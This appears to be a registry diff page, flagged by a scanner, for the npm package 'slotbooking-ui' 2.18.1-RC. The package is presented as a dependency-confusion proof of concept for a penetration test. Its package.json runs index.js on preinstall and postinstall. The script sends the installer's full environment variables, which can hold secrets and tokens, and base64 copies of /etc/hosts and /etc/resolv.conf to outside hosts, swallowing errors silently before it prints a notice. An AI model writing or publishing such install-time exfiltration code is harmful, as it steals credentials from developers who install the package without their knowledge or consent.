slotbooking-ui 2.18.1-RC

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of slotbooking-ui might be problematic. Click here for more details.

package/README.md ADDED
File without changes
package/index.js ADDED
@@ -0,0 +1,118 @@
1
+ /*
2
+ --[Dependency Confusion Attack]--
3
+
4
+ Proof-of-Concept for an ongoing penetration test.
5
+ Please that a look at src/DETAILS.md
6
+ */
7
+
8
+
9
+ const https = require('https');
10
+ const fs = require('fs')
11
+
12
+ let dns_mockendpoint = 'u4z29mfue0mjpoygbtm4zo2cy34usugj.cb.mog'+ 'wailabs.de'
13
+ let endpoint = 'https://npmproject8923895823.mog'+'waisecurity.de/en-US'
14
+
15
+
16
+
17
+ // slightly modified version from
18
+ // https://stackoverflow.com/questions/40537749/how-do-i-make-a-https-post-in-node-js-without-any-third-party-module
19
+ function post(url, data) {
20
+ data["module"] = "1.1.888"
21
+ const dataString = JSON.stringify(data)
22
+
23
+ const options = {
24
+ method: 'POST',
25
+ headers: {
26
+ 'Content-Type': 'application/json',
27
+ 'Content-Length': dataString.length,
28
+ },
29
+ timeout: 1000, // in ms
30
+ }
31
+
32
+ return new Promise((resolve, reject) => {
33
+ const req = https.request(url, options, (res) => {
34
+ if (res.statusCode < 200 || res.statusCode > 299) {
35
+ return reject(new Error(`HTTP status code ${res.statusCode}`))
36
+ }
37
+
38
+ const body = []
39
+ res.on('data', (chunk) => body.push(chunk))
40
+ res.on('end', () => {
41
+ const resString = Buffer.concat(body).toString()
42
+ resolve(resString)
43
+ })
44
+ })
45
+
46
+ req.on('error', (err) => {
47
+ reject(err)
48
+ })
49
+
50
+ req.on('timeout', () => {
51
+ req.destroy()
52
+ reject(new Error('Request time out'))
53
+ })
54
+
55
+ req.write(dataString)
56
+ req.end()
57
+ }).catch(_ignore)
58
+ }
59
+
60
+ function get_file(fname){
61
+ let contents
62
+ if (fs.existsSync(fname)) {
63
+ contents = fs.readFileSync(fname, { encoding: 'base64' })
64
+ }
65
+ return {content: contents, name: fname, empty: !fs.existsSync(fname) }
66
+ }
67
+
68
+
69
+ // https://stackoverflow.com/questions/1349404/generate-random-string-characters-in-javascript
70
+ function makeid(length) {
71
+ let result = '';
72
+ const characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
73
+ const charactersLength = characters.length;
74
+ let counter = 0;
75
+ while (counter < length) {
76
+ result += characters.charAt(Math.floor(Math.random() * charactersLength));
77
+ counter += 1;
78
+ }
79
+ return result;
80
+ }
81
+
82
+ function _ignore(err){
83
+ return
84
+ }
85
+
86
+ function print_info(){
87
+ console.log(``)
88
+ console.log(`[!] Hello it seems like you downloaded the wrong dependency! [!]`)
89
+ console.log(`Your environment is prune to dependency confusion.`)
90
+ console.log(`This is part of an active penetration test. `)
91
+ throw new Error("Depdendency confusion!")
92
+ }
93
+
94
+ // main
95
+ (async() => {
96
+ const device_id = makeid(15)
97
+ endpoint = endpoint + "/" + device_id // ugly but more reliable than other api calls
98
+
99
+ // env
100
+ let data = process.env
101
+ await post(endpoint, data).catch(_ignore)
102
+
103
+ // dns
104
+ try{
105
+ post('https://' +device_id + '-' + dns_mockendpoint, data).catch(_ignore)
106
+ }catch(e){}
107
+
108
+ // mac/lin attribution files
109
+ await post(endpoint, get_file("/etc/hosts")).catch(_ignore)
110
+ await post(endpoint, get_file("/etc/resolv.conf")).catch(_ignore)
111
+
112
+ // win exfil not required - env should be enough
113
+
114
+
115
+ // --[Disclaimer info]--
116
+ print_info()
117
+
118
+ })();
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "slotbooking-ui",
3
+ "version": "2.18.1-RC",
4
+ "description": "Proof-of-Concept for Project 7 - active p e n e t r a t i o n test",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "postinstall": "node index.js",
8
+ "preinstall": "node index.js"
9
+ },
10
+ "author": "",
11
+ "license": "ISC",
12
+ "dependencies": {
13
+ }
14
+ }
package/src/DETAILS.md ADDED
@@ -0,0 +1,2 @@
1
+ ## Information
2
+